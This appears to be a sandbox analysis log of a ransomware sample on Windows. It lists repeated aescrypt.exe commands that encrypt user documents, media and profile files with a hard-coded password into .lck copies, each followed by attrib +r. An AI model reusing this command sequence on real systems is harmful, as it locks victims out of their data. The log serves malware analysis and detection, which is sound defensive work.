- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "These.docx.lck" "These.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "These.docx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Are.docx.lck" "Are.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "Are.docx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Recently.docx.lck" "Recently.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "Recently.docx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Opened.docx.lck" "Opened.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "Opened.docx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Files.docx.lck" "Files.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "Files.docx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugRestart.dot.lck" "DebugRestart.dot"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "DebugRestart.dot.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectSend.dotm.lck" "UnprotectSend.dotm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectSend.dotm.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectConnect.rtf.lck" "UnprotectConnect.rtf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectConnect.rtf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectInitialize.pptm.lck" "ProtectInitialize.pptm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ProtectInitialize.pptm.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddInvoke.docm.lck" "AddInvoke.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "AddInvoke.docm.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RedoConnect.html.lck" "RedoConnect.html"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "RedoConnect.html.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendUnlock.xps.lck" "SendUnlock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "SendUnlock.xps.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmRestart.vsx.lck" "ConfirmRestart.vsx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmRestart.vsx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeEdit.pub.lck" "RevokeEdit.pub"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "RevokeEdit.pub.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMeasure.vdx.lck" "NewMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "NewMeasure.vdx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockUninstall.pdf.lck" "UnblockUninstall.pdf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "UnblockUninstall.pdf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TestDismount.vsw.lck" "TestDismount.vsw"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "TestDismount.vsw.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeFind.xlt.lck" "InvokeFind.xlt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeCompress.pptx.lck" "InvokeCompress.pptx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "InvokeFind.xlt.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r "InvokeCompress.pptx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchRemove.docm.lck" "SearchRemove.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "SearchRemove.docm.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeEdit.vdx.lck" "InitializeEdit.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "InitializeEdit.vdx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestExport.vsd.lck" "RequestExport.vsd"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "RequestExport.vsd.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutGroup.vsdx.lck" "OutGroup.vsdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "OutGroup.vsdx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearMeasure.vdx.lck" "ClearMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Windows\system32\attrib.exeattrib +r "ClearMeasure.vdx.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveWait.ico.lck" "ReceiveWait.ico"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveWait.ico.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnregisterOptimize.xps.lck" "UnregisterOptimize.xps"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UnregisterOptimize.xps.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveImport.php.lck" "ApproveImport.php"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ApproveImport.php.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteRename.xlt.lck" "WriteRename.xlt"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "WriteRename.xlt.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceInitialize.ppsm.lck" "TraceInitialize.ppsm"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "TraceInitialize.ppsm.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopRemove.scf.lck" "PopRemove.scf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "PopRemove.scf.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockBlock.lock.lck" "UnlockBlock.lock"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UnlockBlock.lock.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertUnprotect.potm.lck" "ConvertUnprotect.potm"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConvertUnprotect.potm.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisableDismount.html.lck" "DisableDismount.html"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "DisableDismount.html.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UseDisconnect.ppsx.lck" "UseDisconnect.ppsx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UseDisconnect.ppsx.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectSave.vst.lck" "ConnectSave.vst"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConnectSave.vst.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMove.dib.lck" "NewMove.dib"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "NewMove.dib.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterSave.ocx.lck" "RegisterSave.ocx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RegisterSave.ocx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetLimit.pptx.lck" "GetLimit.pptx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "GetLimit.pptx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeOpen.wdp.lck" "InvokeOpen.wdp"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "InvokeOpen.wdp.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockResume.xlt.lck" "UnblockResume.xlt"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UnblockResume.xlt.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.wmv.lck" "TraceRead.wmv"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.wmv.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendExpand.wmf.lck" "SendExpand.wmf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "SendExpand.wmf.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectApprove.xlsx.lck" "ConnectApprove.xlsx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConnectApprove.xlsx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RemoveDisconnect.vstx.lck" "RemoveDisconnect.vstx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RemoveDisconnect.vstx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResetWait.css.lck" "ResetWait.css"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ResetWait.css.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartEnable.shtml.lck" "StartEnable.shtml"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "StartEnable.shtml.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PushClear.mpe.lck" "PushClear.mpe"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "PushClear.mpe.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddMove.jpg.lck" "AddMove.jpg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "AddMove.jpg.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameConvertFrom.midi.lck" "RenameConvertFrom.midi"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RenameConvertFrom.midi.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDismount.DVR-MS.lck" "RevokeDismount.DVR-MS"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDismount.DVR-MS.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveDisable.nfo.lck" "ApproveDisable.nfo"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ApproveDisable.nfo.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishSelect.otf.lck" "PublishSelect.otf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "PublishSelect.otf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncConfirm.svg.lck" "SyncConfirm.svg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "SyncConfirm.svg.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SavePing.vst.lck" "SavePing.vst"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "SavePing.vst.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditWrite.pub.lck" "EditWrite.pub"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "EditWrite.pub.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RecentPlaces.lnk.lck" "RecentPlaces.lnk"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RecentPlaces.lnk.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Desktop.lnk.lck" "Desktop.lnk"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "Desktop.lnk.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Downloads.lnk.lck" "Downloads.lnk"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "Downloads.lnk.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupUnpublish.docx.lck" "BackupUnpublish.docx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "BackupUnpublish.docx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFromDismount.asp.lck" "ConvertFromDismount.asp"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFromDismount.asp.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CopyStop.cfg.lck" "CopyStop.cfg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "CopyStop.cfg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EnableSelect.vb.lck" "EnableSelect.vb"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "EnableSelect.vb.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditUnprotect.ttc.lck" "EditUnprotect.ttc"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "EditUnprotect.ttc.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeLock.pps.lck" "MergeLock.pps"3⤵
-
